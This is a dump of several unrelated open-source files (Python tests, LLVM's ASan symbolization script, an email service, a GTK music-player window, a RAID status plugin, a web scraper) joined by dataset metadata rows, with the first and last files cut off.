def finish(self):
self.logger.debug('finish')
return SocketServer.BaseRequestHandler.finish(self)
| gpl-2.0 | -1,314,863,412,308,185,900 | 29.0625 | 91 | 0.699931 | false |
youfou/wxpy | tests/api/messages/test_message.py | 1 | 2800 | from datetime import datetime
from tests.conftest import wait_for_message
from wxpy import *
def sent_message(sent_msg, msg_type, receiver):
assert isinstance(sent_msg, SentMessage)
assert sent_msg.type == msg_type
assert sent_msg.receiver == receiver
assert sent_msg.bot == receiver.bot
assert sent_msg.sender == receiver.bot.self
assert isinstance(sent_msg.receive_time, datetime)
assert isinstance(sent_msg.create_time, datetime)
assert sent_msg.create_time < sent_msg.receive_time
class TestMessage:
def test_text_message(self, group, friend):
sent_message(group.send('text'), TEXT, group)
msg = wait_for_message(group, TEXT)
assert isinstance(msg, Message)
assert msg.type == TEXT
assert msg.text == 'Hello!'
assert not msg.is_at
assert msg.chat == group
assert msg.sender == group
assert msg.receiver == group.self
assert msg.member == friend
assert 0 < msg.latency < 30
group.send('at')
msg = wait_for_message(group, TEXT)
assert msg.is_at
def test_picture_message(self, group, image_path):
sent = group.send_image(image_path)
sent_message(sent, PICTURE, group)
assert sent.path == image_path
def test_video_message(self, group, video_path):
sent = group.send_video(video_path)
sent_message(sent, VIDEO, group)
assert sent.path == video_path
def test_raw_message(self, group):
# 发送名片
raw_type = 42
raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人')
sent_message(group.send_raw_msg(raw_type, raw_content), None, group)
def test_send(self, friend, file_path, image_path, video_path):
text_to_send = 'test sending text'
sent = friend.send(text_to_send)
sent_message(sent, TEXT, friend)
assert sent.text == text_to_send
sent = friend.send('@fil@{}'.format(file_path))
sent_message(sent, ATTACHMENT, friend)
assert sent.path == file_path
sent = friend.send('@img@{}'.format(image_path))
sent_message(sent, PICTURE, friend)
assert sent.path == image_path
sent = friend.send('@vid@{}'.format(video_path))
sent_message(sent, VIDEO, friend)
assert sent.path == video_path
# 发送名片
raw_type = 42
raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人')
uri = '/webwxsendmsg'
sent = friend.send_raw_msg(raw_type, raw_content)
sent_message(sent, None, friend)
assert sent.type is None
assert sent.raw_type == raw_type
assert sent.raw_content == raw_content
assert sent.uri == uri
| mit | -5,514,851,197,585,937,000 | 33.65 | 89 | 0.618326 | false |
ensemblr/llvm-project-boilerplate | include/llvm/projects/compiler-rt/lib/asan/scripts/asan_symbolize.py | 1 | 18097 | #!/usr/bin/env python
#===- lib/asan/scripts/asan_symbolize.py -----------------------------------===#
#
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
#
#===------------------------------------------------------------------------===#
import argparse
import bisect
import getopt
import os
import re
import subprocess
import sys
symbolizers = {}
DEBUG = False
demangle = False
binutils_prefix = None
sysroot_path = None
binary_name_filter = None
fix_filename_patterns = None
logfile = sys.stdin
allow_system_symbolizer = True
force_system_symbolizer = False
# FIXME: merge the code that calls fix_filename().
def fix_filename(file_name):
if fix_filename_patterns:
for path_to_cut in fix_filename_patterns:
file_name = re.sub('.*' + path_to_cut, '', file_name)
file_name = re.sub('.*asan_[a-z_]*.cc:[0-9]*', '_asan_rtl_', file_name)
file_name = re.sub('.*crtstuff.c:0', '???:0', file_name)
return file_name
def sysroot_path_filter(binary_name):
return sysroot_path + binary_name
def is_valid_arch(s):
return s in ["i386", "x86_64", "x86_64h", "arm", "armv6", "armv7", "armv7s",
"armv7k", "arm64", "powerpc64", "powerpc64le", "s390x", "s390"]
def guess_arch(addr):
# Guess which arch we're running. 10 = len('0x') + 8 hex digits.
if len(addr) > 10:
return 'x86_64'
else:
return 'i386'
class Symbolizer(object):
def __init__(self):
pass
def symbolize(self, addr, binary, offset):
"""Symbolize the given address (pair of binary and offset).
Overriden in subclasses.
Args:
addr: virtual address of an instruction.
binary: path to executable/shared object containing this instruction.
offset: instruction offset in the @binary.
Returns:
list of strings (one string for each inlined frame) describing
the code locations for this instruction (that is, function name, file
name, line and column numbers).
"""
return None
class LLVMSymbolizer(Symbolizer):
def __init__(self, symbolizer_path, default_arch, system, dsym_hints=[]):
super(LLVMSymbolizer, self).__init__()
self.symbolizer_path = symbolizer_path
self.default_arch = default_arch
self.system = system
self.dsym_hints = dsym_hints
self.pipe = self.open_llvm_symbolizer()
def open_llvm_symbolizer(self):
cmd = [self.symbolizer_path,
'--use-symbol-table=true',
'--demangle=%s' % demangle,
'--functions=linkage',
'--inlining=true',
'--default-arch=%s' % self.default_arch]
if self.system == 'Darwin':
for hint in self.dsym_hints:
cmd.append('--dsym-hint=%s' % hint)
if DEBUG:
print ' '.join(cmd)
try:
result = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
except OSError:
result = None
return result
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if not self.pipe:
return None
result = []
try:
symbolizer_input = '"%s" %s' % (binary, offset)
if DEBUG:
print symbolizer_input
print >> self.pipe.stdin, symbolizer_input
while True:
function_name = self.pipe.stdout.readline().rstrip()
if not function_name:
break
file_name = self.pipe.stdout.readline().rstrip()
file_name = fix_filename(file_name)
if (not function_name.startswith('??') or
not file_name.startswith('??')):
# Append only non-trivial frames.
result.append('%s in %s %s' % (addr, function_name,
file_name))
except Exception:
result = []
if not result:
result = None
return result
def LLVMSymbolizerFactory(system, default_arch, dsym_hints=[]):
symbolizer_path = os.getenv('LLVM_SYMBOLIZER_PATH')
if not symbolizer_path:
symbolizer_path = os.getenv('ASAN_SYMBOLIZER_PATH')
if not symbolizer_path:
# Assume llvm-symbolizer is in PATH.
symbolizer_path = 'llvm-symbolizer'
return LLVMSymbolizer(symbolizer_path, default_arch, system, dsym_hints)
class Addr2LineSymbolizer(Symbolizer):
def __init__(self, binary):
super(Addr2LineSymbolizer, self).__init__()
self.binary = binary
self.pipe = self.open_addr2line()
self.output_terminator = -1
def open_addr2line(self):
addr2line_tool = 'addr2line'
if binutils_prefix:
addr2line_tool = binutils_prefix + addr2line_tool
cmd = [addr2line_tool, '-fi']
if demangle:
cmd += ['--demangle']
cmd += ['-e', self.binary]
if DEBUG:
print ' '.join(cmd)
return subprocess.Popen(cmd,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if self.binary != binary:
return None
lines = []
try:
print >> self.pipe.stdin, offset
print >> self.pipe.stdin, self.output_terminator
is_first_frame = True
while True:
function_name = self.pipe.stdout.readline().rstrip()
file_name = self.pipe.stdout.readline().rstrip()
if is_first_frame:
is_first_frame = False
elif function_name in ['', '??']:
assert file_name == function_name
break
lines.append((function_name, file_name));
except Exception:
lines.append(('??', '??:0'))
return ['%s in %s %s' % (addr, function, fix_filename(file)) for (function, file) in lines]
class UnbufferedLineConverter(object):
"""
Wrap a child process that responds to each line of input with one line of
output. Uses pty to trick the child into providing unbuffered output.
"""
def __init__(self, args, close_stderr=False):
# Local imports so that the script can start on Windows.
import pty
import termios
pid, fd = pty.fork()
if pid == 0:
# We're the child. Transfer control to command.
if close_stderr:
dev_null = os.open('/dev/null', 0)
os.dup2(dev_null, 2)
os.execvp(args[0], args)
else:
# Disable echoing.
attr = termios.tcgetattr(fd)
attr[3] = attr[3] & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, attr)
# Set up a file()-like interface to the child process
self.r = os.fdopen(fd, "r", 1)
self.w = os.fdopen(os.dup(fd), "w", 1)
def convert(self, line):
self.w.write(line + "\n")
return self.readline()
def readline(self):
return self.r.readline().rstrip()
class DarwinSymbolizer(Symbolizer):
def __init__(self, addr, binary, arch):
super(DarwinSymbolizer, self).__init__()
self.binary = binary
self.arch = arch
self.open_atos()
def open_atos(self):
if DEBUG:
print 'atos -o %s -arch %s' % (self.binary, self.arch)
cmdline = ['atos', '-o', self.binary, '-arch', self.arch]
self.atos = UnbufferedLineConverter(cmdline, close_stderr=True)
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if self.binary != binary:
return None
atos_line = self.atos.convert('0x%x' % int(offset, 16))
while "got symbolicator for" in atos_line:
atos_line = self.atos.readline()
# A well-formed atos response looks like this:
# foo(type1, type2) (in object.name) (filename.cc:80)
match = re.match('^(.*) \(in (.*)\) \((.*:\d*)\)$', atos_line)
if DEBUG:
print 'atos_line: ', atos_line
if match:
function_name = match.group(1)
function_name = re.sub('\(.*?\)', '', function_name)
file_name = fix_filename(match.group(3))
return ['%s in %s %s' % (addr, function_name, file_name)]
else:
return ['%s in %s' % (addr, atos_line)]
# Chain several symbolizers so that if one symbolizer fails, we fall back
# to the next symbolizer in chain.
class ChainSymbolizer(Symbolizer):
def __init__(self, symbolizer_list):
super(ChainSymbolizer, self).__init__()
self.symbolizer_list = symbolizer_list
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
for symbolizer in self.symbolizer_list:
if symbolizer:
result = symbolizer.symbolize(addr, binary, offset)
if result:
return result
return None
def append_symbolizer(self, symbolizer):
self.symbolizer_list.append(symbolizer)
def BreakpadSymbolizerFactory(binary):
suffix = os.getenv('BREAKPAD_SUFFIX')
if suffix:
filename = binary + suffix
if os.access(filename, os.F_OK):
return BreakpadSymbolizer(filename)
return None
def SystemSymbolizerFactory(system, addr, binary, arch):
if system == 'Darwin':
return DarwinSymbolizer(addr, binary, arch)
elif system == 'Linux' or system == 'FreeBSD':
return Addr2LineSymbolizer(binary)
class BreakpadSymbolizer(Symbolizer):
def __init__(self, filename):
super(BreakpadSymbolizer, self).__init__()
self.filename = filename
lines = file(filename).readlines()
self.files = []
self.symbols = {}
self.address_list = []
self.addresses = {}
# MODULE mac x86_64 A7001116478B33F18FF9BEDE9F615F190 t
fragments = lines[0].rstrip().split()
self.arch = fragments[2]
self.debug_id = fragments[3]
self.binary = ' '.join(fragments[4:])
self.parse_lines(lines[1:])
def parse_lines(self, lines):
cur_function_addr = ''
for line in lines:
fragments = line.split()
if fragments[0] == 'FILE':
assert int(fragments[1]) == len(self.files)
self.files.append(' '.join(fragments[2:]))
elif fragments[0] == 'PUBLIC':
self.symbols[int(fragments[1], 16)] = ' '.join(fragments[3:])
elif fragments[0] in ['CFI', 'STACK']:
pass
elif fragments[0] == 'FUNC':
cur_function_addr = int(fragments[1], 16)
if not cur_function_addr in self.symbols.keys():
self.symbols[cur_function_addr] = ' '.join(fragments[4:])
else:
# Line starting with an address.
addr = int(fragments[0], 16)
self.address_list.append(addr)
# Tuple of symbol address, size, line, file number.
self.addresses[addr] = (cur_function_addr,
int(fragments[1], 16),
int(fragments[2]),
int(fragments[3]))
self.address_list.sort()
def get_sym_file_line(self, addr):
key = None
if addr in self.addresses.keys():
key = addr
else:
index = bisect.bisect_left(self.address_list, addr)
if index == 0:
return None
else:
key = self.address_list[index - 1]
sym_id, size, line_no, file_no = self.addresses[key]
symbol = self.symbols[sym_id]
filename = self.files[file_no]
if addr < key + size:
return symbol, filename, line_no
else:
return None
def symbolize(self, addr, binary, offset):
if self.binary != binary:
return None
res = self.get_sym_file_line(int(offset, 16))
if res:
function_name, file_name, line_no = res
result = ['%s in %s %s:%d' % (
addr, function_name, file_name, line_no)]
print result
return result
else:
return None
class SymbolizationLoop(object):
def __init__(self, binary_name_filter=None, dsym_hint_producer=None):
if sys.platform == 'win32':
# ASan on Windows uses dbghelp.dll to symbolize in-process, which works
# even in sandboxed processes. Nothing needs to be done here.
self.process_line = self.process_line_echo
else:
# Used by clients who may want to supply a different binary name.
# E.g. in Chrome several binaries may share a single .dSYM.
self.binary_name_filter = binary_name_filter
self.dsym_hint_producer = dsym_hint_producer
self.system = os.uname()[0]
if self.system not in ['Linux', 'Darwin', 'FreeBSD']:
raise Exception('Unknown system')
self.llvm_symbolizers = {}
self.last_llvm_symbolizer = None
self.dsym_hints = set([])
self.frame_no = 0
self.process_line = self.process_line_posix
def symbolize_address(self, addr, binary, offset, arch):
# On non-Darwin (i.e. on platforms without .dSYM debug info) always use
# a single symbolizer binary.
# On Darwin, if the dsym hint producer is present:
# 1. check whether we've seen this binary already; if so,
# use |llvm_symbolizers[binary]|, which has already loaded the debug
# info for this binary (might not be the case for
# |last_llvm_symbolizer|);
# 2. otherwise check if we've seen all the hints for this binary already;
# if so, reuse |last_llvm_symbolizer| which has the full set of hints;
# 3. otherwise create a new symbolizer and pass all currently known
# .dSYM hints to it.
result = None
if not force_system_symbolizer:
if not binary in self.llvm_symbolizers:
use_new_symbolizer = True
if self.system == 'Darwin' and self.dsym_hint_producer:
dsym_hints_for_binary = set(self.dsym_hint_producer(binary))
use_new_symbolizer = bool(dsym_hints_for_binary - self.dsym_hints)
self.dsym_hints |= dsym_hints_for_binary
if self.last_llvm_symbolizer and not use_new_symbolizer:
self.llvm_symbolizers[binary] = self.last_llvm_symbolizer
else:
self.last_llvm_symbolizer = LLVMSymbolizerFactory(
self.system, arch, self.dsym_hints)
self.llvm_symbolizers[binary] = self.last_llvm_symbolizer
# Use the chain of symbolizers:
# Breakpad symbolizer -> LLVM symbolizer -> addr2line/atos
# (fall back to next symbolizer if the previous one fails).
if not binary in symbolizers:
symbolizers[binary] = ChainSymbolizer(
[BreakpadSymbolizerFactory(binary), self.llvm_symbolizers[binary]])
result = symbolizers[binary].symbolize(addr, binary, offset)
else:
symbolizers[binary] = ChainSymbolizer([])
if result is None:
if not allow_system_symbolizer:
raise Exception('Failed to launch or use llvm-symbolizer.')
# Initialize system symbolizer only if other symbolizers failed.
symbolizers[binary].append_symbolizer(
SystemSymbolizerFactory(self.system, addr, binary, arch))
result = symbolizers[binary].symbolize(addr, binary, offset)
# The system symbolizer must produce some result.
assert result
return result
def get_symbolized_lines(self, symbolized_lines):
if not symbolized_lines:
return [self.current_line]
else:
result = []
for symbolized_frame in symbolized_lines:
result.append(' #%s %s' % (str(self.frame_no), symbolized_frame.rstrip()))
self.frame_no += 1
return result
def process_logfile(self):
self.frame_no = 0
for line in logfile:
processed = self.process_line(line)
print '\n'.join(processed)
def process_line_echo(self, line):
return [line.rstrip()]
def process_line_posix(self, line):
self.current_line = line.rstrip()
#0 0x7f6e35cf2e45 (/blah/foo.so+0x11fe45)
stack_trace_line_format = (
'^( *#([0-9]+) *)(0x[0-9a-f]+) *\((.*)\+(0x[0-9a-f]+)\)')
match = re.match(stack_trace_line_format, line)
if not match:
return [self.current_line]
if DEBUG:
print line
_, frameno_str, addr, binary, offset = match.groups()
arch = ""
# Arch can be embedded in the filename, e.g.: "libabc.dylib:x86_64h"
colon_pos = binary.rfind(":")
if colon_pos != -1:
maybe_arch = binary[colon_pos+1:]
if is_valid_arch(maybe_arch):
arch = maybe_arch
binary = binary[0:colon_pos]
if arch == "":
arch = guess_arch(addr)
if frameno_str == '0':
# Assume that frame #0 is the first frame of new stack trace.
self.frame_no = 0
original_binary = binary
if self.binary_name_filter:
binary = self.binary_name_filter(binary)
symbolized_line = self.symbolize_address(addr, binary, offset, arch)
if not symbolized_line:
if original_binary != binary:
symbolized_line = self.symbolize_address(addr, binary, offset, arch)
return self.get_symbolized_lines(symbolized_line)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='ASan symbolization script',
epilog='Example of use:\n'
'asan_symbolize.py -c "$HOME/opt/cross/bin/arm-linux-gnueabi-" '
'-s "$HOME/SymbolFiles" < asan.log')
parser.add_argument('path_to_cut', nargs='*',
help='pattern to be cut from the result file path ')
parser.add_argument('-d','--demangle', action='store_true',
help='demangle function names')
parser.add_argument('-s', metavar='SYSROOT',
help='set path to sysroot for sanitized binaries')
parser.add_argument('-c', metavar='CROSS_COMPILE',
help='set prefix for binutils')
parser.add_argument('-l','--logfile', default=sys.stdin,
type=argparse.FileType('r'),
help='set log file name to parse, default is stdin')
parser.add_argument('--force-system-symbolizer', action='store_true',
help='don\'t use llvm-symbolizer')
args = parser.parse_args()
if args.path_to_cut:
fix_filename_patterns = args.path_to_cut
if args.demangle:
demangle = True
if args.s:
binary_name_filter = sysroot_path_filter
sysroot_path = args.s
if args.c:
binutils_prefix = args.c
if args.logfile:
logfile = args.logfile
else:
logfile = sys.stdin
if args.force_system_symbolizer:
force_system_symbolizer = True
if force_system_symbolizer:
assert(allow_system_symbolizer)
loop = SymbolizationLoop(binary_name_filter)
loop.process_logfile()
| mit | 6,929,749,312,844,605,000 | 34.139806 | 95 | 0.62375 | false |
wazo-pbx/xivo-auth | wazo_auth/services/email.py | 1 | 4200 | # Copyright 2018-2020 The Wazo Authors (see the AUTHORS file)
# SPDX-License-Identifier: GPL-3.0-or-later
import time
import smtplib
from collections import namedtuple
from email import utils as email_utils
from email.mime.text import MIMEText
from wazo_auth.services.helpers import BaseService
EmailDestination = namedtuple('EmailDestination', ['name', 'address'])
# NOTE(sileht): default socket timeout is None on linux
# Our client http client is 10s, since sending mail is currently synchronous
# we have to be sure we return before the 10s, so we set the SMTP timeout.
SMTP_TIMEOUT = 4
class EmailService(BaseService):
def __init__(self, dao, tenant_uuid, config, template_formatter):
super().__init__(dao, tenant_uuid)
self._formatter = template_formatter
self._smtp_host = config['smtp']['hostname']
self._smtp_port = config['smtp']['port']
self._confirmation_token_expiration = config['email_confirmation_expiration']
self._reset_token_expiration = config['password_reset_expiration']
self._confirmation_from = EmailDestination(
config['email_confirmation_from_name'],
config['email_confirmation_from_address'],
)
self._password_reset_from = EmailDestination(
config['password_reset_from_name'], config['password_reset_from_address']
)
def confirm(self, email_uuid):
self._dao.email.confirm(email_uuid)
def send_confirmation_email(
self, username, email_uuid, email_address, connection_params
):
template_context = dict(connection_params)
template_context.update(
{
'token': self._new_email_confirmation_token(email_uuid),
'username': username,
'email_uuid': email_uuid,
'email_address': email_address,
}
)
body = self._formatter.format_confirmation_email(template_context)
subject = self._formatter.format_confirmation_subject(template_context)
to = EmailDestination(username, email_address)
self._send_msg(to, self._confirmation_from, subject, body)
def send_reset_email(self, user_uuid, username, email_address, connection_params):
template_context = dict(connection_params)
template_context.update(
{
'token': self._new_email_reset_token(user_uuid),
'username': username,
'user_uuid': user_uuid,
'email_address': email_address,
}
)
body = self._formatter.format_password_reset_email(template_context)
subject = self._formatter.format_password_reset_subject(template_context)
to = EmailDestination(username, email_address)
self._send_msg(to, self._confirmation_from, subject, body)
def _send_msg(self, to, from_, subject, body):
msg = MIMEText(body)
msg['To'] = email_utils.formataddr(to)
msg['From'] = email_utils.formataddr(from_)
msg['Subject'] = subject
with smtplib.SMTP(
self._smtp_host, self._smtp_port, timeout=SMTP_TIMEOUT
) as server:
server.sendmail(from_.address, [to.address], msg.as_string())
def _new_email_confirmation_token(self, email_uuid):
acl = 'auth.emails.{}.confirm.edit'.format(email_uuid)
return self._new_generic_token(self._confirmation_token_expiration, acl)
def _new_email_reset_token(self, user_uuid):
acl = 'auth.users.password.reset.{}.create'.format(user_uuid)
return self._new_generic_token(self._reset_token_expiration, acl)
def _new_generic_token(self, expiration, *acl):
t = time.time()
token_payload = {
'auth_id': 'wazo-auth',
'pbx_user_uuid': None,
'xivo_uuid': None,
'expire_t': t + expiration,
'issued_t': t,
'acl': acl,
'user_agent': 'wazo-auth-email-reset',
'remote_addr': '',
}
session_payload = {}
token_uuid, session_uuid = self._dao.token.create(
token_payload, session_payload
)
return token_uuid
| gpl-3.0 | 9,150,577,829,045,108,000 | 37.53211 | 86 | 0.621429 | false |
yoseforb/lollypop | src/fullscreen.py | 1 | 9247 | #!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk, Gdk, GLib
from cgi import escape
from gettext import gettext as _
from lollypop.define import Lp, ArtSize, Type
from lollypop.utils import seconds_to_string
# Show a fullscreen window showing current track context
class FullScreen(Gtk.Window):
"""
Init window and set transient for parent
@param: parent as Gtk.window
"""
def __init__(self, parent):
Gtk.Window.__init__(self)
self._timeout = None
self._seeking = False
self._signal1_id = None
self._signal2_id = None
self.set_transient_for(parent)
self.set_skip_taskbar_hint(True)
self.set_skip_pager_hint(True)
builder = Gtk.Builder()
builder.add_from_resource('/org/gnome/Lollypop/FullScreen.ui')
main_widget = builder.get_object('fs')
self.add(main_widget)
self._prev_btn = builder.get_object('prev_btn')
self._prev_btn.connect('clicked', self._on_prev_btn_clicked)
self._play_btn = builder.get_object('play_btn')
self._play_btn.connect('clicked', self._on_play_btn_clicked)
self._next_btn = builder.get_object('next_btn')
self._next_btn.connect('clicked', self._on_next_btn_clicked)
self._play_image = builder.get_object('play_image')
self._pause_image = builder.get_object('pause_image')
close_btn = builder.get_object('close_btn')
close_btn.connect('clicked', self._destroy)
self._cover = builder.get_object('cover')
self._title = builder.get_object('title')
self._artist = builder.get_object('artist')
self._album = builder.get_object('album')
self._next = builder.get_object('next')
self._next_cover = builder.get_object('next_cover')
self._progress = builder.get_object('progress_scale')
self._progress.connect('button-release-event',
self._on_progress_release_button)
self._progress.connect('button-press-event',
self._on_progress_press_button)
self._timelabel = builder.get_object('playback')
self._total_time_label = builder.get_object('duration')
self.connect('key-release-event', self._on_key_release_event)
"""
Init signals, set color and go party mode if nothing is playing
"""
def do_show(self):
is_playing = Lp.player.is_playing()
self._signal1_id = Lp.player.connect('current-changed',
self._on_current_changed)
self._signal2_id = Lp.player.connect('status-changed',
self._on_status_changed)
if is_playing:
self._change_play_btn_status(self._pause_image, _('Pause'))
self._on_current_changed(Lp.player)
else:
Lp.player.set_party(True)
if not self._timeout:
self._timeout = GLib.timeout_add(1000, self._update_position)
Gtk.Window.do_show(self)
self._update_position()
self.fullscreen()
"""
Remove signals and unset color
"""
def do_hide(self):
if self._signal1_id:
Lp.player.disconnect(self._signal1_id)
self._signal1_id = None
if self._signal2_id:
Lp.player.disconnect(self._signal2_id)
self._signal2_id = None
if self._timeout:
GLib.source_remove(self._timeout)
self._timeout = None
#######################
# PRIVATE #
#######################
"""
Update View for current track
- Cover
- artist/title
- reset progress bar
- update time/total labels
@param player as Player
"""
def _on_current_changed(self, player):
if player.current_track.id is None:
pass # Impossible as we force play on show
else:
if Lp.player.current_track.id == Type.RADIOS:
self._prev_btn.set_sensitive(False)
self._next_btn.set_sensitive(False)
self._timelabel.hide()
self._total_time_label.hide()
self._progress.hide()
cover = Lp.art.get_radio(player.current_track.artist,
ArtSize.MONSTER)
else:
self._prev_btn.set_sensitive(True)
self._next_btn.set_sensitive(True)
self._timelabel.show()
self._total_time_label.show()
self._progress.show()
cover = Lp.art.get_album(player.current_track.album_id,
ArtSize.MONSTER)
self._cover.set_from_pixbuf(cover)
del cover
album = player.current_track.album
if player.current_track.year != '':
album += " (%s)" % player.current_track.year
self._title.set_text(player.current_track.title)
self._artist.set_text(player.current_track.artist)
self._album.set_text(album)
next_cover = Lp.art.get_album(player.next_track.album_id,
ArtSize.MEDIUM)
self._next_cover.set_from_pixbuf(next_cover)
del next_cover
self._next.set_markup("<b>%s</b> - %s" %
(escape(player.next_track.artist),
escape(player.next_track.title)))
self._progress.set_value(1.0)
self._progress.set_range(0.0, player.current_track.duration * 60)
self._total_time_label.set_text(
seconds_to_string(player.current_track.duration))
self._timelabel.set_text("0:00")
"""
Destroy window if Esc
@param widget as Gtk.Widget
@param event as Gdk.event
"""
def _on_key_release_event(self, widget, event):
if event.keyval == Gdk.KEY_Escape:
self.destroy()
"""
Go to prev track
@param widget as Gtk.Button
"""
def _on_prev_btn_clicked(self, widget):
Lp.player.prev()
"""
Play/pause
@param widget as Gtk.Button
"""
def _on_play_btn_clicked(self, widget):
if Lp.player.is_playing():
Lp.player.pause()
widget.set_image(self._play_image)
else:
Lp.player.play()
widget.set_image(self._pause_image)
"""
Go to next track
@param widget as Gtk.Button
"""
def _on_next_btn_clicked(self, widget):
Lp.player.next()
"""
Update buttons and progress bar
@param obj as unused
"""
def _on_status_changed(self, obj):
is_playing = Lp.player.is_playing()
if is_playing and not self._timeout:
self._timeout = GLib.timeout_add(1000, self._update_position)
self._change_play_btn_status(self._pause_image, _("Pause"))
elif not is_playing and self._timeout:
GLib.source_remove(self._timeout)
self._timeout = None
self._change_play_btn_status(self._play_image, _("Play"))
"""
On press, mark player as seeking
@param unused
"""
def _on_progress_press_button(self, scale, data):
self._seeking = True
"""
Callback for scale release button
Seek player to scale value
@param scale as Gtk.Scale, data as unused
"""
def _on_progress_release_button(self, scale, data):
value = scale.get_value()
self._seeking = False
self._update_position(value)
Lp.player.seek(value/60)
"""
Update play button with image and status as tooltip
@param image as Gtk.Image
@param status as str
"""
def _change_play_btn_status(self, image, status):
self._play_btn.set_image(image)
self._play_btn.set_tooltip_text(status)
"""
Update progress bar position
@param value as int
"""
def _update_position(self, value=None):
if not self._seeking and self._progress.is_visible():
if value is None:
value = Lp.player.get_position_in_track()/1000000
self._progress.set_value(value)
self._timelabel.set_text(seconds_to_string(value/60))
return True
"""
Destroy self
@param widget as Gtk.Button
"""
def _destroy(self, widget):
self.destroy()
| gpl-3.0 | 6,808,737,461,966,250,000 | 35.988 | 77 | 0.571753 | false |
vfuse/nixstatsagent | nixstatsagent/plugins/mdstat.py | 2 | 1272 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import plugins
import json
class Plugin(plugins.BasePlugin):
__name__ = 'mdstat'
def run(self, config):
'''
Monitor software raid status using mdadm
pip install mdstat
'''
data = os.popen('sudo mdjson').read()
results = {}
try:
data = json.loads(data)
except Exception:
return "Could not load mdstat data"
for key, value in data['devices'].items():
device = {}
if(value['active'] is not True):
device['active'] = 0
else:
device['active'] = 1
if(value['read_only'] is not False):
device['read_only'] = 1
else:
device['read_only'] = 0
if(value['resync'] is not None):
device['resync'] = 1
else:
device['resync'] = 0
device['faulty'] = 0
for disk, diskvalue in value['disks'].items():
if diskvalue['faulty'] is not False:
device['faulty'] = device['faulty'] + 1
results[key] = device
return results
if __name__ == '__main__':
Plugin().execute()
| bsd-3-clause | 1,352,827,415,557,494,500 | 26.652174 | 59 | 0.474843 | false |
mcheatham/computationalEnvironmentODP | bin/kernels.py | 1 | 3923 | #!/usr/bin/env python3
from bs4 import BeautifulSoup
from requests import get
from bs4.element import Tag
ignore = {'Lisp Machines, Inc.', 'Symbolics', 'Texas Instruments', 'Xerox'}
levels = {}
levels['Apple Inc.'] = {3}
levels['On S/360, S/370, and successor mainframes'] = {3}
levels['On other hardware platforms'] = {3}
def before(tag1, tag2, startTag):
if len(tag1) == 0: return False;
if len(tag2) == 0 :return True;
tempTag = startTag
while tempTag and tempTag.previous_sibling:
tempTag = tempTag.previous_sibling
if isinstance(tempTag, Tag):
if tag1 in tempTag.getText():
return True
elif tag2 in tempTag.getText():
return False
return True
def includeLI(tag):
for p in tag.parents:
# ignores tags in the page's table of contents, navigation header, and footer
if 'id' in p.attrs.keys() and ('toc' in p['id'] or 'mw-navigation' in p['id'] or 'footer' in p['id']):
return False;
# ignores links to external references and wikipedia categories
if 'class' in p.attrs.keys() and ('references' in p['class'] or 'reference' in p['class'] or 'catlinks' in p['class']):
return False;
# ignores navigation links
if 'role' in p.attrs.keys() and 'navigation' in p['role']:
return False;
# ignores the 'See also' links
if tag.parent and tag.parent.find_previous_sibling('h2') and 'See also' in tag.parent.find_previous_sibling('h2').text:
return False;
# ignores the external links
if tag.parent and tag.parent.find_previous_sibling('h2') and 'External links' in tag.parent.find_previous_sibling('h2').text:
return False;
return True;
def includeA(tag):
# ignores tags specified directly in the ignore list
if tag.text in ignore:
return False;
# ignores links to external references and wikipedia categories
p = tag.parent
if p and 'class' in p.attrs.keys() and 'reference' in p['class']:
return False;
# this page displays operating systems at various levels of specificity,from kernel down to
# particular distributions in some cases. the script allows the user to specify the correct
# level(s) of each list to pull using the 'levels' dictionary defined abouve. the code below
# insures that the tag is at an acceptable level. if the level is not specified, top-level
# items are pulled.
h4Depth = -1 # -1 because it takes one move to get out of the <a> tag itself
h4Heading = ''
temp = tag
while temp and not temp.find_previous_sibling('h4'):
h4Depth += 1
temp = temp.parent
if temp and temp.find_previous_sibling('h4') and temp.find_previous_sibling('h4').select('span'):
h4Heading = temp.find_previous_sibling('h4').select('span')[0].getText()
h3Depth = -1
h3Heading = ''
temp = tag
while temp and not temp.find_previous_sibling('h3'):
h3Depth += 1
temp = temp.parent
if temp and temp.find_previous_sibling('h3') and temp.find_previous_sibling('h3').select('span'):
h3Heading = temp.find_previous_sibling('h3').select('span')[0].getText()
if h4Depth < h3Depth or before(h4Heading, h3Heading, temp) and h4Heading in levels:
return h4Depth in levels[h4Heading]
elif h3Heading in levels:
return h3Depth in levels[h3Heading];
else:
return h3Depth == 1
baseUrl = 'https://en.wikipedia.org/wiki/List_of_operating_systems'
doc = get(baseUrl).text
soup = BeautifulSoup(doc, 'html.parser')
listItems = soup.select('li')
answers = set()
for i in listItems:
if not includeLI(i): continue
links = i.select('a')
if links and includeA(links[0]) and not links[0].getText() in answers:
answers.add(links[0].getText())
for answer in sorted(answers):
print(answer)
| mit | -7,770,033,104,525,160,000 | 29.889764 | 129 | 0.647973 | false |
dariox2/CADL | test/testyida6b.py | 1 | 4901 |
#
# test shuffle_batch - 6b
#
# generates a pair of files (color+bn)
# pending: make the tuple match
#
print("Loading tensorflow...")
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import os
from libs import utils
import datetime
tf.set_random_seed(1)
